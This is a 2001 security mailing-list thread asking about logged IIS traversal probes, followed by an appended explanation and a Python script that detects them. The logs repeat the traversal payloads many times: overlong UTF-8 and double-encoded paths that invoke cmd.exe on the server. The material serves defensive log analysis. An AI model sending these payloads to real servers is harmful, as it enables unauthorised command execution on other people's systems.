[Dshield] win32 exploit?

Mel Chandler PMI MChandler at pmi.delta.org
Fri Aug 3 20:24:27 GMT 2001


Looks like someone is trying to execute cmd.exe to do god knows what.  Is
this a Windows 2000 server that has had that vulnerability patched already?
It looks like they're trying to exploit it unsuccessfully.

Mel L. Chandler, A+, Network+, MCNE, MCDBA, MCSE+I, CCNA
MChandler at PMI.Delta.org
Network Analyst
Information Services
PMI Delta Dental
(562) 467-6627

===================================
= not many animals were harmed in =
=    the making of this email     =
===================================


-----Original Message-----
From: Joseph Shraibman [mailto:jks at selectacast.net]
Sent: Friday, August 03, 2001 11:02 AM
To: dshield at dshield.org
Subject: [Dshield] win32 exploit?


Does anyone know what this is?

216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"

[31/Jul/2001:21:45:41 -0400] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
bogus_host_without_reverse_dns 207.213.220.70 - - [06/Apr/2001:22:21:26
-0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 344
bogus_host_without_reverse_dns 128.121.2.139 - - [16/Jun/2001:18:14:33
-0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 -
error_log:[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70]
File does not exist:
/local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..
À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
error_log:[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File
does not exist:
/local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..
À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
error_log:[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File
does not exist:
/local/www/apps253/apps/scripts/..Á?../winnt/system32/cmd.exe
error_log:[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File
does not exist:
/local/www/apps253/apps/scripts/..%5c%5c../winnt/system32/cmd.exe
207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 332
128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 332
216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 332 "-" "-"
128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 332 "-" "-"
216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
"-" "-"
61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/w
innt/system32/cmd.exe
[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/w
innt/system32/cmd.exe
[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 328
128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 328
216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 328 "-" "-"
128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 328 "-" "-"
216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-"
"-"
61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
"-" "-"
[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/w
innt/system32/cmd.exe
[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/w
innt/system32/cmd.exe
[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe


-- 
Joseph Shraibman
jks at selectacast.net
Increase signal to noise ratio.  http://www.targabot.com
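The requests quoted above are the well-known IIS "web server folder traversal" probes: the `/scripts/..` prefix, then a path separator hidden either as an overlong UTF-8 sequence (`%c0%af` for `/`, `%c1%9c` for `\`) or double URL-encoded (`%255c` decodes to `%5c`, then to `\`), then `../winnt/system32/cmd.exe?/c+dir`. The following is an added example, not code from the post or from Dshield, showing the decoding a defender needs to classify such lines in an Apache access log and to separate the one case that matters (a 2xx response) from the refused ones. It generalises slightly beyond the three encodings in the thread: any two-byte sequence with a `C0`/`C1` lead byte is an overlong form that valid UTF-8 never uses, so it is decoded arithmetically rather than from a lookup table. The log lines are constructed, modelled on the ones in the post, with RFC 5737 documentation addresses; the log-format regex assumes the combined/common format shown in the thread.

```python
"""Flag IIS-style overlong-UTF-8 / double-decode traversal probes in Apache access logs.

Added example, not part of the Dshield post. Sample lines are constructed.
"""
import re
from urllib.parse import unquote_to_bytes

# Common/combined log format as seen in the thread; the protocol token is optional
# because some of the quoted lines lack "HTTP/1.0".
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[^"\s]+) (?P<target>[^"\s]+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Two-byte sequences with a C0 or C1 lead byte are overlong encodings of ASCII
# (valid UTF-8 never produces them). %c0%af -> '/', %c1%9c -> '\'.
OVERLONG_RE = re.compile(rb"[\xc0\xc1][\x80-\xbf]")


def _decode_overlong(m):
    lead, cont = m.group(0)[0], m.group(0)[1]
    return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])


def normalize_path(target, max_rounds=3):
    """Decode a request target the way a lenient server would.

    Returns (normalized_path, techniques): percent-decoding is repeated until it
    stops changing the string (catching %255c), overlong sequences are collapsed
    to the ASCII they hide, and backslashes are folded to '/'.
    """
    techniques = set()
    current = target.split("?", 1)[0].encode("latin-1", "replace")
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    if rounds > 1:
        techniques.add("double-encoding")
    if OVERLONG_RE.search(current):
        techniques.add("overlong-utf8")
        current = OVERLONG_RE.sub(_decode_overlong, current)
    path = current.decode("latin-1").replace("\\", "/")
    return path, techniques


def is_traversal(path):
    """True when the '..' segments climb above the virtual root the path started in."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def scan_line(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, techniques = normalize_path(m["target"])
    traversal = is_traversal(path)
    shell = path.lower().endswith("/cmd.exe")
    if not (traversal or shell):
        return None
    status = int(m["status"])
    return {
        "host": m["host"],
        "status": status,
        "normalized": path,
        "techniques": sorted(techniques),
        "traversal": traversal,
        "targets_shell": shell,
        # 2xx means the server answered with content (the case the reply worries
        # about); 404 means the request was refused, i.e. a probe that failed.
        "served": 200 <= status < 300,
    }


def scan(lines):
    return [f for f in (scan_line(l) for l in lines) if f]


# Constructed sample lines modelled on the thread (documentation IPs, not real hosts).
SAMPLE_LOG = [
    # overlong '\' (%c1%9c), answered 200
    '192.0.2.10 - - [03/Aug/2001:13:24:59 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"',
    # double-encoded backslashes (%255c), refused with 404
    '192.0.2.11 - - [31/Jul/2001:21:45:41 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    # four overlong '/' (%c0%af) steps, refused with 404
    '192.0.2.12 - - [06/Apr/2001:22:21:26 -0400] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332',
    # benign requests for comparison; the second has '..' but never leaves the root
    '192.0.2.13 - - [06/Apr/2001:22:25:00 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"',
    '192.0.2.14 - - [06/Apr/2001:22:26:00 -0400] "GET /a/b/../c.html HTTP/1.0" 200 12',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Run over the sample, the first three lines are flagged and the two benign ones are not; only the first finding carries `served: True`, which is the line to investigate on the server side (what the request actually returned, and whether that host is patched), while the 404s record probes the server rejected. The same normalization is what makes the `À¯` and `Á?` in the error_log entries above legible: they are the raw `C0 AF` and `C1 9C` bytes written out in Latin-1.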

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield